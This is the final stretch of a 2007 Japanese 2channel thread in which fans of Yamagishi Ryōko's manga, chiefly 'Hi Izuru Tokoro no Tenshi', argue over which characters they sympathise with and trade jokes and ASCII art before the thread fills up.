自分も図書館で大きな地図やロシア・ソ連事典とか見たけど、見つけられなかった。
結局どのあたりなんだろう。

898 :花と名無しさん:2007/07/26(木) 22:23:24 ID:???O
いんだよ細けえことは

899 :花と名無しさん:2007/07/26(木) 22:40:55 ID:???0
千花ちゃん…トゥオネラで「いいんだよこまけry」を踊ってるんだ!!

900 :花と名無しさん:2007/07/26(木) 22:52:06 ID:???0
高森真由子がボランティア部を選んだ理由って出てきたっけ?
千花と同じ理由っぽいけど。

901 :花と名無しさん:2007/07/26(木) 23:32:21 ID:???0
>>897
ハルギツでググっても、アラベスク関連でしか出てこない。
架空の地名なのか、別表記が一般的なのか、かな。

902 :花と名無しさん:2007/07/26(木) 23:32:46 ID:???0
フッツーは髪一筋乱さないんだからインランじゃないだろw
でも好きな毛人とはどうだったんだろうね。
ずっと純粋培養されてきて唯一の経験が大王に無理強い…だったら
セクース大嫌いとかなりそうだけど。

903 :花と名無しさん:2007/07/26(木) 23:34:48 ID:???0
嫉妬はかけ離れた相手より、自分に近い相手にするというのを
思い出した

904 :花と名無しさん:2007/07/26(木) 23:39:38 ID:???0
>>903
なんでwww誰と誰?

905 :花と名無しさん:2007/07/27(金) 00:07:08 ID:???0
>>884
落ち着いてくだされ、厩戸の。

906 :花と名無しさん:2007/07/27(金) 00:15:02 ID:???0
王子至上主義の考えって理解できない。

907 :花と名無しさん:2007/07/27(金) 00:18:05 ID:???0
理解はできるが、共感できない。

908 :花と名無しさん:2007/07/27(金) 00:19:35 ID:???O
なんか気違いじみてて怖い。

909 :花と名無しさん:2007/07/27(金) 00:23:36 ID:???0
>>902
最初にケミシにおっぱい触られたときに、「あ・・・」とかいってたじゃん。
好きな相手だとキモチイイというお約束の展開では。

910 :花と名無しさん:2007/07/27(金) 00:54:10 ID:???O
>>901
ソ連時代から地名がいろいろ変わってるしね〜
もはや我々にはわからないよ。
日本だって市町村合併吸収分裂を繰り返してて、
外国からじゃわかりにくくなってるかもね。

911 :花と名無しさん:2007/07/27(金) 01:03:15 ID:???O
>>906
処天は、様々な人間の視点で話が進むから、
人によって感情移入する人が違うのが面白い。

しかし誰に感情移入しよーが何かが許せない、救われない、それが処天だ。

馬子に感情移入した人もいるかもねw
神なのか…このお方は…なんて王子をホントに尊敬しちゃったり。


912 :花と名無しさん:2007/07/27(金) 01:12:53 ID:???0
コブラに感情移入しました

913 :花と名無しさん:2007/07/27(金) 01:43:55 ID:???O
>>910
地名は重要な文化なのにねぇ。
アホな国ほど地名を変える。

914 :花と名無しさん:2007/07/27(金) 01:54:32 ID:???0
南アルプス市…

915 :花と名無しさん:2007/07/27(金) 02:07:50 ID:DJtkPvilO
ここのひとたちはトシのひとがおおいの?
若いと主人公に感情移入するけど、トシのひとは冷静になっちゃうからしかたないになるって誰かいってた。

916 :花と名無しさん:2007/07/27(金) 02:10:27 ID:???0
幻の南セントレア市…

917 :花と名無しさん:2007/07/27(金) 02:21:54 ID:???O
>>915
ネット見てて、フツ姫に感情移入してる人がいるのには驚いた。
コブラも同じく驚いた。
いろんな人がいるんだねぇ〜。

私は毛人と王子の4:6でした。
だから複雑。毛人の気持ちも分かる!分かるが…辛いよ!
私には淡水もフツ姫もジャマでした。

918 :花と名無しさん:2007/07/27(金) 02:23:27 ID:???O
>>916
聞いたことねぇ。どっかの国の漫画で使われてたりして。
田舎出身のバレリーナの故郷。

919 :花と名無しさん:2007/07/27(金) 02:25:32 ID:???O
山梨県 南ハルギツ市

920 :花と名無しさん:2007/07/27(金) 02:29:04 ID:???0
フッツーはなんかイイコちゃんで嫌だった。いつも安全なところで
守られていていいよなーって感じで。
トジコが酷い事になっていた所為もあるのでなんだかなぁ。

921 :花と名無しさん:2007/07/27(金) 03:29:00 ID:???0
ふっつーは確かにイイ子すぎて見ててむかつくし、
王子びいきとしては邪魔でしょうがないけどさ、
「いつも安全なとこで守られて」って、それは見当違いじゃねえか?
まだ母の恋しい幼い頃に何もわからぬまま斎宮に祭り上げられ隔離され、
泣き暮らしたこども時代。
そして長じてみれば劣勢の物部側の人間ということで肩身の狭い居候扱いになり、
やっと巡り合えた好きな男とは相思相愛にかかわらず邪魔されまくり、
好きでもないキモ大君に嫁がされるんだよ?

922 :花と名無しさん:2007/07/27(金) 03:42:05 ID:???0
>>915
若い人はフッツー嫌いって言いたいの?
最初に読んだときは若かったが、当時からフッツー嫌いじゃなかったけどw

923 :花と名無しさん:2007/07/27(金) 03:49:50 ID:???0
イイ子なので苦手、と言うならわかるが嫌いって。攻撃的。

924 :花と名無しさん:2007/07/27(金) 06:50:56 ID:???O
>>884は心狭いんじゃなくて、攻撃的だから怖いのか

925 :花と名無しさん:2007/07/27(金) 07:42:54 ID:???O
>>884
気持ちは分かるがフツもそれなりに可愛そうだからそこまで思えない。

926 :花と名無しさん:2007/07/27(金) 08:38:05 ID:???O
>>911
誰にも感情移入出来なかった

927 :花と名無しさん:2007/07/27(金) 09:25:28 ID:???0
フッツー派だったので、王子が殺し損ねて泣き顔を見せた時は
胸がすくようだった。我ながらドSだな。

928 :花と名無しさん:2007/07/27(金) 09:26:47 ID:mMQdwQ8E0
>>884は鬼女。間違いない。

929 :花と名無しさん:2007/07/27(金) 09:54:14 ID:???O
王子が好きすぎて、毛の身勝手さもフツのご都合も大っ嫌い!みんな許せない!
というのは、千花が好きすぎてryというのとよく似てるな。

自分はそこまでひとりのキャラに入れ込むって事は(特にギシマンでは)ないから
どんなキャラでも許せないという感覚にはなれない。
なんか俯瞰してるというか。

930 :花と名無しさん:2007/07/27(金) 10:08:16 ID:???0
>>918
ググればたくさん出てくるけど、愛知県南セントレア市だよ。

931 :花と名無しさん:2007/07/27(金) 10:51:46 ID:???0
いんだよ細

932 :花と名無しさん:2007/07/27(金) 11:02:22 ID:???O
六花が好きすぎて(ryの婆乙



って言われるよ、そんな馬鹿な書き方すると

933 :花と名無しさん:2007/07/27(金) 11:04:19 ID:???0
・・・くならなくても。
ふとみ

934 :花と名無しさん:2007/07/27(金) 11:13:54 ID:???O
>>932
いや別にそこはなんでもええがなw

935 :花と名無しさん:2007/07/27(金) 11:27:19 ID:???O
>>928
岡村響子さんと見せかけた響子父じゃないかな。
フッツー好きでもないが、淫乱という表現は当てはまらないと思う。
同性に使う言葉じゃないって感じも何となくある。

936 :花と名無しさん:2007/07/27(金) 11:50:45 ID:???O
なんでキエ━が出てくるの?

937 :花と名無しさん:2007/07/27(金) 11:59:02 ID:???0
>>929
確かにね。

フツはあのナヨナヨ女女した生々しさのある外見が苦手だった。
そこが毛人にはチャームポイントだったんだろうけれど。
一読者としては、フツがもっと魅力的な美人だったら、「フツや白髪女ウザ」
と思わなかったかも。それとは別に、人格的には立派な人なのはわかる。

毛人が王子を拒むのは残念なんだけど、毛人の言っていることは本当に正論なんだな。
それにしても、なぜか毛人は王子に逆らう時になると能弁で正論派になるのなw

作品通して好きなのは、馬子と額田。

938 :花と名無しさん:2007/07/27(金) 11:59:37 ID:???0
キエーーーーーって初出なんだっけ?

939 :花と名無しさん:2007/07/27(金) 12:02:10 ID:???0
>>937
フッツーが毅然として、健気な面ものぞかせたら共感する人
も増えたかもしれないけれど、確かにあの生々しさは暑苦しいかも。

だれにも感情移入できなかったけれど、強いてあげると調子麻呂?

940 :花と名無しさん:2007/07/27(金) 12:14:33 ID:???O
>>935
言うよー。主婦同士の噂話で
「あの人とんだ淫乱だわ」とかw

941 :花と名無しさん:2007/07/27(金) 12:18:20 ID:???O
>>939
あー私近いかも。調子麿呂のように王子を見てるかなー
だからそんなに王子に思い入れはなく、…じゃなくてそこそこあって?、特にフツも憎くなく。という感じ。
調子麿呂のお坊ちゃん時代が見たいな。
普通に使用人とかもいただろうに、馬小屋愛してたり。
調子麿呂なら、この時代にタイムスリップしてもうまく順応して生きていけそう。w
たくましいというか、柔軟な感じがいいと思うであります

942 :花と名無しさん:2007/07/27(金) 12:18:42 ID:???O
最近どの板のギシスレも微妙にギシギシしてて
それなりに解釈論みたいのが進んでてワロスw
てか楽しいww

943 :花と名無しさん:2007/07/27(金) 12:19:51 ID:???O
>>941
後のトガッシーである

944 :花と名無しさん:2007/07/27(金) 12:20:00 ID:???0
>>940
中島みゆきの歌思い出した

945 :花と名無しさん:2007/07/27(金) 12:25:43 ID:???0
>>941
同じような感じを持っている人がいて驚いた。
そんな感じ。ちょっと執事っぽいというか、まぁ良い部下というか
おつきの者って感じで。

王子の事を悪く思っていないし、キモイとも思っていないし、
案じてはいるけれど、深入りしないというか、必要以上に
巻き込まれないところが良いのかも。王子観察みたいなw

946 :花と名無しさん:2007/07/27(金) 12:33:23 ID:???0
『スピリチュアル・リーディング(笛野はすな氏・著)』という本に、
“ツインソウル”という説明が載ってた。
厩戸と毛人はツインソウルだったんじゃないのかな。@処天


947 :花と名無しさん:2007/07/27(金) 12:37:24 ID:???O
>>945
いっぺん逆鱗に触れて龍とか出されたけどね。
まああれで懲りたとかじゃなく、王子との距離を上手く保てる素質あったんだと思う。
実際、あんなお方だしw、すごく難しいと思うけど。
うつ病になった人の家族の接し方だっけ、「暖かな無関心」?何かそういうのも感じるような。

948 :花と名無しさん:2007/07/27(金) 12:59:28 ID:???0
>>947
あったね、龍出現w

王子にも結構気に入られていたから、ずっと仕えられた訳だしね。
冷静だし、精神的に大人だと思われるので上手く対応が出来たの
かもしれないね。
あんなお方wなので気に入らないものは絶対に赦さないというか
近づけないものね。

949 :花と名無しさん:2007/07/27(金) 13:38:04 ID:???0
龍が出てきてギリギリギリ、と腕をねじりあげたけど、
途中で王子、「ハッ」とか気付いて調子麻呂を開放してあげてたね。
あれがどーでもいいはしためとかだったら、コロスとこまでやってたな、王子は。
相当気に入られてて、ほとんど身内なもんだから調子麻呂はあんなお仕置きだけですんだと。

950 :花と名無しさん:2007/07/27(金) 13:54:17 ID:???0
そんな感じだろうね。
多分下女とか気に入らなかったら殺害するかもしれない。

自分が興味を持たない人物に対して王子って容赦ないから…

951 :花と名無しさん:2007/07/27(金) 14:59:39 ID:???O
今、あたしの部屋にプチ枝豆があるの…みんな食べて、ってノンナに言われたい…
おろしたてのサンダルのせいで、足がもうすぐちぎれる予定なんだけど、
みつけるまで家には帰れない…!(パチ屋で休憩中、プレイはしないよ)
王子って興味のない人間に容赦ない、ていうの、フツが憎い!とかの感情よりよっぽど怖いよね
目を引く存在でいろんな人に興味をもたれやすいし、
容姿だけで人をひきつける魅力もあって、そういうのときには利用するけど、基本的にはわずらわしいくらいなんだろね
わたしの欲するものは…はそういう王子だから本当に切ないな
じんじん…足痛い

952 :花と名無しさん:2007/07/27(金) 15:10:18 ID:???O
>>951
化野から乙

953 :花と名無しさん:2007/07/27(金) 15:41:12 ID:aaj0COO9O
>>951
となりに壁向いてうずくまってる髪が蛇の女の人がいませんか

954 :花と名無しさん:2007/07/27(金) 16:00:28 ID:???0
うずくまってる髪が蛇の女

    。シャー
   ∫
_| ̄|○

955 :花と名無しさん:2007/07/27(金) 17:09:55 ID:???O
>>942
自分が書いたかと思った

956 :花と名無しさん:2007/07/27(金) 20:05:39 ID:???0
次スレ

〓山岸凉子 Part126〓
http://anime2.2ch.net/test/read.cgi/gcomic/1185534230/

957 :花と名無しさん:2007/07/27(金) 20:16:11 ID:???0
早くねえか?

958 :花と名無しさん:2007/07/27(金) 20:28:31 ID:???0
まぁ950行ったし、こんなもんじゃね?

959 :花と名無しさん:2007/07/27(金) 21:22:24 ID:???O
>>956
乙です
ありがとう

960 :花と名無しさん:2007/07/27(金) 22:13:20 ID:0pvMc1mi0
いい子すぎて無価値区キャラってみなみ見たいな子かな・・・
フツ姫はそれなりに魅力的だった。

961 :花と名無しさん:2007/07/27(金) 22:34:21 ID:???0
チカみたいなこ

962 :花と名無しさん:2007/07/27(金) 23:03:18 ID:???0
いい子過ぎるというか、布都姫の上品で清潔で世間知らずなキャラは
斎宮としての修行の上に成り立ってるんだから、ムカついたりはしない。

963 :花と名無しさん:2007/07/27(金) 23:09:00 ID:???O
>>961
毛箱にとってはまさにそうだったんだろうな……。

964 :花と名無しさん:2007/07/27(金) 23:10:22 ID:???0
対談で氷室冴子氏が「フツちゃん、この子何よって感じw」と言ったら
ギシ先生は「そうなんです、この頃全然男女の恋愛に興味持てなくてw
フツはただ必要だから出してきただけ」っていうようなことを言ってた。
ギシ先生自身もそう思って書いてるんだったら、そりゃ読んでる我々も
「何だよこの女は、うぜえなあ」と思いますよね、別に悪いことしてなくてもw

965 :花と名無しさん:2007/07/27(金) 23:10:33 ID:???0
フツのキャラにはムカついたりしないけど、
でも、
リカ=王子、カンチ=毛人、さとみ=フツ姫
という構図は思い浮かんでしまう。

966 :花と名無しさん:2007/07/27(金) 23:11:57 ID:???0
>>964
ちょっと違う様な…

「頑張って描いたのに何故か読者に人気なくって」「トジコのが人気あったのよね」
みたいな感じじゃなかった?
文庫版一巻の巻末にあった対談だと。

967 :花と名無しさん:2007/07/27(金) 23:12:23 ID:???0
>>965
以前その話は出た気がするがw
改めてなるほどという感じですな〜

968 :花と名無しさん:2007/07/27(金) 23:15:40 ID:???0
    /⌒\  /⌒\
  ((    ; 三    ,,))
    ヽ   (  /    ミ   マラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラマラ・・・・・・・・・・
     キ   .メ   ./
     乂____ノ       -‐、
    / ̄.| | |  `‐-------´  /
   (──┘ |__|   ____   ヽ
    `ー─┬┬─ ´     丶-‐´
     .━━┷┷━━
    
   (⌒ヽ、                  (⌒ヽ、      
  (     )         , ⌒ヽ    (    )
  ゝ     ヽ      (    .'   (       ヽ⌒ヽ
(         )     ゝ    `ヽ(           )
 ゝ           `ヽ,(    (                `ヽ
(              )    )                 )  
                                       
           ( ・∀・)( ・∀・) <チンポヘリが愛を込めて>>1乙!!!!ノ~~^^~~~~~~~~~
〜〜〜〜〜〜〜| ̄〆 ̄ ̄ ̄ ̄ ̄ノ〜〜〜〜〜ヽ_ノ〜〜=〜〜〜〜〜〜ノ ̄ ̄
          ヾ〜〜〜〜〜〜ヾ                       〜〜〜〜

969 :花と名無しさん:2007/07/27(金) 23:17:53 ID:???0
間人に比べたらフッツーなんて可愛いもの

王子と一緒の墓に入りたくないんだったら
来目の後追い自殺でもすれば良かったのに

970 :964:2007/07/27(金) 23:19:37 ID:???0
>>966
今、文庫二巻を改めて確認してみたけど、964のニュアンスでしたよ。


971 :花と名無しさん:2007/07/27(金) 23:20:04 ID:???0
>>963
そんな感じ。
南も新田の妹に嫌がらせされてたしw

972 :花と名無しさん:2007/07/27(金) 23:22:04 ID:???0
>>970
そうでしたか。ゴメンね

973 :花と名無しさん:2007/07/27(金) 23:22:09 ID:???0
つまりこのスレの住人は毛箱

974 :花と名無しさん:2007/07/27(金) 23:27:24 ID:???O
毛箱ほどのバイタリティーも演技力も若さもないよ……。

975 :花と名無しさん:2007/07/27(金) 23:32:40 ID:???0
つまりもっと若くてバイタリティがあって演技力があれば毛箱になっていたと。

976 :花と名無しさん:2007/07/27(金) 23:35:26 ID:???O
さあね。

977 :花と名無しさん:2007/07/27(金) 23:37:08 ID:???0
なつかしいね毛箱論w

978 :花と名無しさん:2007/07/27(金) 23:45:20 ID:???O
役割は重要だった割にあまり登場せず、今後登場の機会がなさそう。
なんか変わった立ち位置の奴だったな。

979 :花と名無しさん:2007/07/27(金) 23:51:23 ID:???0
>>965
リカの泣く場面やエキセントリックさや、最後は別の道を行く所や
カンチの優柔不断さや、さとみの男受けしそうな所や視聴者や読者からの嫌われぶりは
言われてみると似ている。

980 :花と名無しさん:2007/07/27(金) 23:52:47 ID:???0
>>966
>>964で大筋で合っていると思う。
山岸先生は適当に描いたようなニュアンスだった。

981 :花と名無しさん:2007/07/27(金) 23:54:03 ID:???0
>>980
>>970

982 :花と名無しさん:2007/07/27(金) 23:56:43 ID:???0
いんだよ細けえことは

983 :花と名無しさん:2007/07/27(金) 23:56:54 ID:???0
>>969
やっぱラスボスはハシト?

984 :花と名無しさん:2007/07/28(土) 00:00:43 ID:???0
「ママが僕を一番に思ってくれなかったのがいけないんだい。
僕がこうなったのもママのせい。僕を一番に愛して欲しかったのに」
だと、イタタな甘ったれだけど、
王子の場合は、あの特殊な能力もあっての孤独感だったもんね。

985 :花と名無しさん:2007/07/28(土) 00:02:31 ID:???0
まあでも子供が超能力者だったらキモって思う気持ちもわかるけどな。

986 :花と名無しさん:2007/07/28(土) 00:07:52 ID:???0
案外、来目は母親の愛が少なかったとしても、大らかに対応していける子だったりして。
繊細な王子が母親の愛を必要としていたのとは対照的に。

987 :花と名無しさん:2007/07/28(土) 00:08:08 ID:???0
>>983
ラスボスかと言って間を倒しちゃったら
それはそれでバッドエンドな気がする。

988 :花と名無しさん:2007/07/28(土) 00:32:52 ID:???O
最後に同じ墓に入れたのは未練か嫌がらせか気になる。


あ、生物都市薦めてくれた人、ありがとう。面白かったよ。
でも僕とフリオのほうが好みかも。ブラッドベリみたいだ。

989 :花と名無しさん:2007/07/28(土) 08:42:21 ID:???O
死んで永遠に一緒の墓に入るんだから、嫌がらせではできまい。

990 :花と名無しさん:2007/07/28(土) 08:50:39 ID:???0
間人が死んだ時、王子は涙を流したのだろうか。気になる。

991 :花と名無しさん:2007/07/28(土) 09:35:03 ID:???O
>>988
どっちもなんじゃない?
お墓は来目と一緒でよろ、ていうの知ってて最後に復讐してやりたかったようにも感じる。
クックックッ…て感じ+執着(未練)?
王子、少し暑苦しいな…

992 :花と名無しさん:2007/07/28(土) 09:44:53 ID:???0
うっとおしいよね

993 :花と名無しさん:2007/07/28(土) 10:22:55 ID:???0
激しく憎むってことは
激しく愛することの裏返しだからなー
王子の母への愛憎はもの凄いエネルギーを使うもんだったはず
母にしてみればそれも含めて「どうすればいいかわからない」だったのでは

よく言われることだが愛の反対語は無関心な訳だしな
いっそ王子もそうなれれば良かったのに

994 :花と名無しさん:2007/07/28(土) 11:01:58 ID:???O
>>993
憎む、という語感にすでに相手に対するねっとりしたもんあるよね。
愛の反対語は無関心、これは大いに納得。
(とある芸能人スレの誰よりも情報に詳しい、元盲目ファンからアンチになった粘着野郎に言ってやりたい…
ファンサイトチェックも怠らないんだよね…)
でも、激しく憎むことは激しく愛する、の裏返しというより、
気になってしょうがない、執着、執念であって「愛する」とはまた別かなあて思う。
極端だけど、家族や友人を誰かに殺されたらそいつを激しく憎しむだろうし、許せないと思う。
けど、そこには絶対に、愛はないよね。
念は相当なものになると思うけど。
王子のケースは>>993の通りかなとは思うんだけど。

995 :花と名無しさん:2007/07/28(土) 11:07:19 ID:???0
東京バレエ団のギエムの広告見て。
上に伸ばした両腕と、上げた片足が平行w
二重間接ってこういうことなのねん。

996 :花と名無しさん:2007/07/28(土) 11:15:12 ID:???0
>>994
「愛の裏返しが憎」の意味が分かってないと思われ。

英語で言うとlove←→hateだよ。

997 :花と名無しさん:2007/07/28(土) 12:38:54 ID:???0


998 :花と名無しさん:2007/07/28(土) 12:41:04 ID:???0
次スレ

〓山岸凉子 Part126〓
http://anime2.2ch.net/test/read.cgi/gcomic/1185534230/

999 :花と名無しさん:2007/07/28(土) 12:41:17 ID:???0
>>986
妹や弟は比較的精神的に気楽そうだもんね。
生まれた時から姉や兄の存在が前提となっているから、
ちょっと聡い子なら、どっちの立場に立つにせよ親の愛情の差や
考えの異なる身近な相手を前提として考えを形成してる感じがする。
人によっては冷めているなと思わされるくらい。
ギシ漫画にもあるように、親の贔屓でグレたり傷付く人もいるだろうけど、
独占への欲求や相手へのわだかまりがまだ低い分、傷は浅いっていうか。
姉や兄はのしかかってくるものが大きくてしんどいとこがある。

1000 :花と名無しさん:2007/07/28(土) 12:42:15 ID:???0
1000だったらみんなでギシギシ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

229 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)